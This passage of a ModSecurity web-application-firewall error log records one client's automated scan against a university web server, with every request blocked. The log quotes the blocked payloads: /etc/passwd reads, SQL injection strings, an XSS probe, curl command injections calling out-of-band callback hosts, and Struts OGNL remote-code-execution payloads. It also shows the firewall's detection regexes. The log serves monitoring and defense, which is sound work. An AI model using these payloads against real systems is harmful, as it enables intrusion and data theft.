"ZO11IMCo-f0AAARo80kAAAAT"]
[Tue Aug 29 11:33:37.326427 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARt--cAAAAV"]
[Tue Aug 29 11:33:37.347950 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAAOJKfQAAAAE"]
[Tue Aug 29 11:33:37.387962 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAAOJKfYAAAAE"]
[Tue Aug 29 11:33:38.529528 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARjjO4AAAAL"]
[Tue Aug 29 11:33:39.366359 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAASBXRgAAAAM"]
[Tue Aug 29 11:33:40.339530 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARjjPYAAAAL"]
[Tue Aug 29 11:33:40.430462 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARy-xkAAAAb"]
[Tue Aug 29 11:33:40.466895 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAAQKOn4AAAAs"]
[Tue Aug 29 11:33:41.304743 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAASBXR0AAAAM"]
[Tue Aug 29 11:33:41.469335 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARQ4BMAAAAB"]
[Tue Aug 29 11:33:42.327392 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAASAHcoAAAAH"]
[Tue Aug 29 11:33:43.503875 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4CAAAAAB"]
[Tue Aug 29 11:33:45.425115 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAANsAk8AAAAD"]
[Tue Aug 29 11:33:47.352991 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAARtABQAAAAV"]
[Tue Aug 29 11:33:47.412663 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg8o79pf97deez6.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARtABcAAAAV"]
[Tue Aug 29 11:33:48.356362 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "mbkm.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAASDb6UAAAAA"]
[Tue Aug 29 11:33:49.311156 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgj7rpepbhahun1.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11LcCo-f0AAASEJQIAAAAE"]
[Tue Aug 29 11:33:49.336583 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgwuuihsyxz6pd6.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARo830AAAAT"]
[Tue Aug 29 11:33:49.408179 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "mbkm.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAARo84AAAAAT"]
[Tue Aug 29 11:33:50.308500 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgg3eezd5i8xfwh.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAASAHd8AAAAH"]
[Tue Aug 29 11:33:50.369089 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "mbkm.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAAQKOpoAAAAs"]
[Tue Aug 29 11:33:51.324110 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "mbkm.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAARQ4DEAAAAB"]
[Tue Aug 29 11:33:52.408864 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARtACsAAAAV"]
[Tue Aug 29 11:33:52.647608 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "mbkm.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARQ4EEAAAAB"]
